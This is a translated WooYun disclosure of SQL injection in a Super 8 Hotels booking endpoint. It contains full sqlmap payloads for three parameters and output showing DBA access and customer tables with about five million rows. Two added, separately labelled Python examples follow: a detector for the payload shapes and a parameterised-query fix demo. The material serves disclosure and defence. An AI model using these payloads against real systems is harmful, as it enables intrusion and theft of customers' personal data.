
Vulnerability summary

Defect ID: wooyun-2015-0142899

Vulnerability title: A Super 8 Hotels (速8酒店) site has multiple SQL injection points that bypass its filtering (DBA privileges + five million customer records exposed)

Related vendor: 速8酒店 (Super 8 Hotels)

Vulnerability author: 路人甲

Submitted: 2015-09-23 09:00

Fix time: 2015-09-28 09:02

Published: 2015-09-28 09:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-23: Details sent to the vendor, awaiting vendor action
2015-09-28: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

It's been almost a month: I captured the traffic and tested it, found an injection, but didn't submit it. Now I've retested it to submit. After this long, hopefully it doesn't duplicate someone else's report!~~~

Detailed description:

http://cp.super8.com.cn/Hotel/List
or
http://cp.super8.com.cn/
Capture the request:

http://cp.super8.com.cn/Hotel/HotelList (POST)
stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9


citycode, honour and servercs are injectable
(you could also try the parameters in the Cookie or the Referer for injection!~~~)

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: honour
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Place: POST
Parameter: citycode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='iwOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Place: POST
Parameter: servercs
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
---
[01:57:05] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: citycode, type: Single quoted string (default)
[1] place: POST, parameter: honour, type: Unescaped numeric
[2] place: POST, parameter: servercs, type: Unescaped numeric
[q] Quit
> 0
[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[02:00:23] [INFO] fetching current user
[02:00:23] [INFO] resumed: sa
current user: 'sa'
[02:00:23] [INFO] fetching current database
[02:00:23] [INFO] resumed: crs2
current database: 'crs2'
[02:00:23] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [17]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] crstemp
[*] NT AUTHORITY\SYSTEM
[*] NT Service\MSSQLSERVER
[*] NT SERVICE\SQLSERVERAGENT
[*] NT SERVICE\SQLWriter
[*] NT SERVICE\Winmgmt
[*] PHHXAPP12\Administrator
[*] sa
[*] super8crs
available databases [20]:
[*] crs2
[*] crs3
[*] crs_all
[*] crs_report
[*] FHS_SRC
[*] ipegasus3
[*] ipegasus3_empty
[*] ipegasus3_test
[*] ipegasus_gresall
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_test125
[*] master
[*] model
[*] model2
[*] msdb
[*] s8_new
[*] s8_ws
[*] Super8_DW
[*] tempdb
Database: crs2
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.Cu_CustomerInfo      | 5059428 |
| dbo.Cu_AvailableCard     | 5232807 |
| dbo.customertemp         | 4147436 |
| dbo.Order_GstInfo        | 1271902 |
| dbo.Order_OptInfo        | 1175851 |
| dbo.Order_Info           | 1163925 |
| dbo.Order_StatisticsInfo | 1163925 |
| dbo.Weixin_Mapping       |  524954 |
| dbo.Order_Email          |  196106 |
| dbo.customermobile       |  139662 |
| dbo.CC_CorpCustomer      |  122552 |
| dbo.Cu_CustomerLog       |   24126 |
| dbo.PMS_User             |     942 |
| dbo.UP_User              |     519 |
+--------------------------+---------+
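The three payload shapes sqlmap reported against this endpoint (an error-based CONVERT(INT, ...) wrapper built from CHAR() calls, a time-based "heavy query" that cross-joins sysusers, and a boolean tautology appended after the closing quote) are distinctive enough to alert on at the web tier. The following Python script is an added example, not part of the report, that turns those shapes into detection rules and runs them over captured POST bodies; the rule names, the scan_body/scan_all functions and the sample bodies are constructed here, and the rules are illustrative rather than any vendor's rule set.

```python
import re
from urllib.parse import parse_qs

# Illustrative rules derived from the three payload shapes in the sqlmap output
# above; they are not a vendor rule set. parse_qs decodes '+' to a space, so the
# rules deliberately do not depend on the '+' string-concatenation operator.
SIGNATURES = [
    ("error-based CONVERT/CHAR",
     re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(\s*\d+\s*\)", re.I | re.S)),
    ("heavy-query time-based",
     re.compile(r"FROM\s+sysusers\s+AS\s+\w+\s*(?:,\s*sysusers\s+AS\s+\w+\s*){2,}", re.I)),
    ("boolean tautology",
     re.compile(r"(?:'|\))\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
]


def scan_body(body):
    """Return (parameter, rule) pairs for every form field whose value matches a rule."""
    findings = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for rule, regex in SIGNATURES:
                if regex.search(value):
                    findings.append((param, rule))
                    break  # report only the first rule that fires for this value
    return findings


# Constructed request bodies: the legitimate request from the report and three
# bodies carrying the payload shapes sqlmap reported for citycode, honour and servercs.
BENIGN_BODY = ("stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228"
               "&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9")
BOOLEAN_BODY = ("stime=2015-09-01&etime=2015-09-02&roomnum=1"
                "&citycode=110100') AND 2424=2424 AND ('aDZF'='aDZF"
                "&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9")
ERROR_BODY = ("stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228&servercs="
              "&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)"
              "+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHAR(48) END))"
              "+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155"
              "&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9")
HEAVY_BODY = ("stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode=228"
              "&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,"
              "sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)"
              " AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=9")


def scan_all():
    """Scan each constructed body; returns a dict mapping label -> findings."""
    return {label: scan_body(body) for label, body in
            [("benign", BENIGN_BODY), ("boolean", BOOLEAN_BODY),
             ("error", ERROR_BODY), ("heavy", HEAVY_BODY)]}


if __name__ == "__main__":
    for label, findings in scan_all().items():
        print("%-8s %s" % (label, findings or "no findings"))
```

Rules of this kind are a detection aid, not a fix: sqlmap's tamper scripts (which the warning line in the output above alludes to) can re-encode payloads, so the signatures should be treated as a way to spot probing in logs and in front of the application, with the real remediation being parameterised queries in the handler.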


Only a sample of the data was pulled as proof, as shown in the images below!~~~

[Image: 1.jpg]

[Image: 2.jpg]

The remaining databases can be read as well; I didn't go further!~~~

Proof of vulnerability:

As described above.

Fix recommendation:

Fix by filtering the input.

Copyright notice: please credit the source when reposting: 路人甲@乌云
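The recommendation above is filtering. As an added example that is not from the report or the vendor, the Python block below uses an in-memory SQLite table of constructed hotel rows (SQLite stands in for the site's SQL Server; the mechanism is the same) to show why the boolean-based citycode payload from the sqlmap output succeeds against a string-built query and has no effect against a bound parameter, and adds a strict integer allow-list for parameters that the output shows injected unquoted, such as honour and servercs. The table name, column names and function names are assumptions, not the site's schema.

```python
import re
import sqlite3

# Constructed sample rows standing in for the hotel table that the HotelList
# endpoint searches; the table and column names are assumptions, not the site's schema.
SAMPLE_HOTELS = [
    (1, "110100", "Super 8 Beijing Chaoyang"),
    (2, "110100", "Super 8 Beijing Haidian"),
    (3, "310100", "Super 8 Shanghai Pudong"),
]

# Boolean-based payloads in the shape sqlmap reported for citycode:
# the first carries a true condition, the second a false one.
PAYLOAD_TRUE = "110100') AND 2424=2424 AND ('aDZF'='aDZF"
PAYLOAD_FALSE = "110100') AND 2424=2425 AND ('aDZF'='aDZF"


def make_db():
    """Build an in-memory SQLite database as a stand-in for the site's SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Hotel (id INTEGER PRIMARY KEY, citycode TEXT, name TEXT)")
    conn.executemany("INSERT INTO Hotel VALUES (?, ?, ?)", SAMPLE_HOTELS)
    return conn


def hotel_list_vulnerable(conn, citycode):
    """String-built query: the request parameter becomes part of the SQL text."""
    sql = "SELECT name FROM Hotel WHERE (citycode='%s') ORDER BY id" % citycode
    return [row[0] for row in conn.execute(sql)]


def hotel_list_fixed(conn, citycode):
    """Bound parameter: the value travels to the driver separately and is never parsed as SQL."""
    sql = "SELECT name FROM Hotel WHERE (citycode=?) ORDER BY id"
    return [row[0] for row in conn.execute(sql, (citycode,))]


INT_PARAM = re.compile(r"-?\d{1,10}")


def is_int_param(raw):
    """Strict allow-list for parameters the report shows injected unquoted
    (honour, servercs): the whole value must be a single integer literal."""
    return INT_PARAM.fullmatch(raw) is not None


def demo():
    """Run both handlers against a legitimate value and the report's payload shapes."""
    conn = make_db()
    return {
        "legit_vulnerable": hotel_list_vulnerable(conn, "110100"),
        "true_payload_vulnerable": hotel_list_vulnerable(conn, PAYLOAD_TRUE),
        "false_payload_vulnerable": hotel_list_vulnerable(conn, PAYLOAD_FALSE),
        "legit_fixed": hotel_list_fixed(conn, "110100"),
        "true_payload_fixed": hotel_list_fixed(conn, PAYLOAD_TRUE),
    }


if __name__ == "__main__":
    for label, names in demo().items():
        print("%-26s %s" % (label, names))
    print("is_int_param('228')             =", is_int_param("228"))
    print("is_int_param('-4628) OR 7763=1') =", is_int_param("-4628) OR 7763=1"))
```

Against the string-built handler the true payload returns exactly the rows a legitimate citycode=110100 search returns and the false payload returns none, which is the oracle that boolean-based blind injection reads one bit at a time; against the bound-parameter handler the same payload is just a string that matches no row. In an ASP.NET handler the equivalent is SqlCommand with SqlParameter objects for every request value, and a filter on its own is only a second line of defence.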


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored)

Ignored at: 2015-09-28 09:02

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None yet